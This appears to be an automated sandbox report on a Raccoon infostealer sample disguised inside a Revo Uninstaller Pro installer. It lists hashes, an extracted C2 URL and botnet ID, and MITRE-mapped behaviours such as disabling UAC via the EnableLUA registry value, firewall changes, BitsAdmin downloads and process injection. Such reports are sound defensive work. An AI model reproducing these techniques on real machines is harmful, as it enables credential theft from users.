raccoon | 2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799

Analysis

max time kernel
145s
max time network
146s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-10-2024 14:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
Size

18.8MB
MD5

0b3937c39ea113c3352090ac5ce26103
SHA1

9db17df61d6222c8d96a3969887d27c1568e4e7b
SHA256

2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799
SHA512

0bd27f4d58ccfc4b950d727f402ba260f98bf0e99d0f71bba4baa38131fcb0675d0b3105db3bf6bfb95388f0a717a54494ad9be889772b40e5b38f675564aa30
SSDEEP

393216:6Y+TwhZBn9zau6aa17rtANXDa8H1Ecuv9WA2R+y3prshUy:6Y+UV9zau6lKNTLJ29QRy

Score

10^/10

raccoon 0343d4da493d263f78921a8724ca6adf05347cfe discovery dropper evasion execution persistence privilege_escalation stealer trojan

Malware Config

Extracted

Family

raccoon

Version

1.7.3

Botnet

0343d4da493d263f78921a8724ca6adf05347cfe

Attributes

url4cnc
https://telete.in/jbitchsucks

rc4.plain

Signatures

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V1 payload 4 IoCs

resource	yara_rule
behavioral1/memory/2988-381-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/2988-382-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/2988-378-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1
behavioral1/memory/2988-376-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon_v1

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2112	powershell.exe
1384	powershell.exe
2512	powershell.exe
2188	powershell.exe
2236	powershell.exe
584	powershell.exe
2548	powershell.exe
2816	powershell.exe
2668	powershell.exe
1000	powershell.exe
2484	powershell.exe
908	powershell.exe
3060	powershell.exe
1520	powershell.exe
2956	powershell.exe
1272	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2884	bitsadmin.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\DRIVERS\SET2839.tmp	rundll32.exe
File created	C:\Windows\system32\DRIVERS\SET2839.tmp	rundll32.exe
File opened for modification	C:\Windows\system32\DRIVERS\revoflt.sys	rundll32.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2652	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\International\Geo\Nation	ruplp.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 13 IoCs

pid	Process
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2840	Revo Uninstaller Pro 4.2.3.exe
2336	Revo Uninstaller Pro 4.2.3.tmp
1876	ruplp.exe
1564	7z.exe
3044	RevoUninPro.exe
1136	7z.exe
2548	7z.exe
2228	111.exe
2844	RevoUninPro.exe
2820	ruplp.exe
2532	111.exe
2988	111.exe

Loads dropped DLL 26 IoCs

pid	Process
1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2840	Revo Uninstaller Pro 4.2.3.exe
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
1208	Process not Found
1208	Process not Found
1208	Process not Found
1208	Process not Found
1208	Process not Found
1208	Process not Found
776	regsvr32.exe
2336	Revo Uninstaller Pro 4.2.3.tmp
3052	cmd.exe
1564	7z.exe
1136	7z.exe
2548	7z.exe
3052	cmd.exe
1208	Process not Found
1208	Process not Found

Modifies system executable filetype association 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o"	rundll32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2228 set thread context of 2988	2228	111.exe	78

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-R3G4K.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CCP1.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P42QS.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-EPSJK.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P16HQ.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8J9A4.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-LM2NR.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-H28K7.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SABMQ.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9JREG.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-O1JAE.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5JKK.tmp	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1FKA5.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DJPHA.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-4N1NQ.tmp	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
File created	C:\Program Files (x86)\is-U6KOT.tmp	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CRER1.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-ISCMV.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-55INN.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9P2QL.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-931CM.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1RODL.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JFCQE.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3TS51.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6UR6Q.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q8BBP.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-39OPA.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3JF08.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-8495I.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JTHFQ.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-28FML.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9IIPE.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-RFR70.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GSVS2.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6EHPV.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQB8P.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PVVH9.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-59SL6.tmp	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T4M4R.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-RJHJR.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-J94CH.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8LUA5.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-BI39F.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RO2T.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0F60D.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4R7ND.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CV8TO.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M9TL8.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-78MGP.tmp	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q4T3N.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-S2T3L.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DT655.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AD34U.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L6J3P.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11GRQ.tmp	Revo Uninstaller Pro 4.2.3.tmp
File created	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HA11U.tmp	Revo Uninstaller Pro 4.2.3.tmp
File opened for modification	C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll	Revo Uninstaller Pro 4.2.3.tmp

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\DisplayIcon.ico	RevoUninPro.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	rundll32.exe
File opened for modification	C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe	RevoUninPro.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ruplp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mode.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ruplp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Revo Uninstaller Pro 4.2.3.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Revo Uninstaller Pro 4.2.3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	runonce.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	runonce.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1584	timeout.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel"	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID	ruplp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}"	ruplp.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\""	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe"	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}"	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0"	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library"	ruplp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.ruel	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro"	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.ruel	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF}\ = "RUExt"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510"	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version	ruplp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open\command	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications"	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon	Revo Uninstaller Pro 4.2.3.tmp
